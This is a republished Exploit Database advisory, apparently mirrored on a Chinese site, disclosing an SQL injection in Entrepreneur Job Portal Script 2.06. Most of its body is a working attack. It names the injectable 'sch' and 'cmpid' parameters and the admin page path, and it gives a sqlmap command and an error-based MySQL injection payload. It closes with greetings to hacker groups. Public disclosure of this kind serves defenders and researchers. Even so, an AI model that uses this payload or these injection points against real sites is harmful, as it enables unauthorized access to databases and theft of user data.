Entrepreneur Job Portal Script 2.06 – SQL Injection

• Exploit Database
• 159 阅读

• 作者： OoN_Boy
  日期： 2016-10-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40479/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52

  [x]========================================================================================================================================[x] | Title: Entrepreneur Job Portal Script SQL Injection | Software : Entrepreneur Job Portal Script | Version : 2.06 | Vendor : http://www.i-netsolution.com/ | Date : 07 October 2016 | Author : OoN_Boy [x]========================================================================================================================================[x]       [x]========================================================================================================================================[x] | Technology : PHP | Database : MySQL | Price: $353 - $1399 | Description: Jobsite Script is an advanced PHP job site script to start Job site like all popular . It is a complete script with advanced features. [x]========================================================================================================================================[x]     [x]========================================================================================================================================[x] | Proof of concept SQL 1 : http://localhost/job-portal/jobsearch_all.html?sch=%Inject_Here%21 | Proof of concept SQL 2 : http://localhost/job-portal/jobsearch_all.html?cmpid=%Inject_Here%21 | | Admin Page : http://localhost/[path]/admin/index.php [x]========================================================================================================================================[x]       [x]========================================================================================================================================[x] | Exploit With Sqlmap sqlmap -u 'http://localhost/job-portal/jobsearch_all.html?cmpid=31453525536' --- Parameter: cmpid (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: cmpid=31453525536' AND (SELECT 8347 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8347=8347,1))),0x7178716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjF'='tqjF ---   [x]========================================================================================================================================[x]   [x]========================================================================================================================================[x] | Greetz : antisecurity.org batamhacker.or.id |Vrs-hCk NoGe Jack zxvf Angela h4ntu reel dono Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va |k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Hi All long time no see ^_^ [x]========================================================================================================================================[x]